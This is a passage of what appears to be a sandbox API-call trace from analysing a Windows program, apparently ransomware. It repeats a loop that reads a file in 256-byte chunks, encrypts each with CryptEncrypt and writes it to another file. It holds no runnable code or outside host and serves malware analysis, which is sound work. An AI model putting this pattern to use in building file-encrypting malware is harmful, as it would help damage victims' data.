lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.172] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.172] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.172] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.172] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.173] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.173] GetLastError () returned 0x0 [0168.173] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.173] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.174] GetLastError () returned 0x0 [0168.174] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.174] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.175] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.175] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.175] GetLastError () returned 0x0 [0168.175] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.176] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.176] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.176] GetLastError () returned 0x0 [0168.176] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, 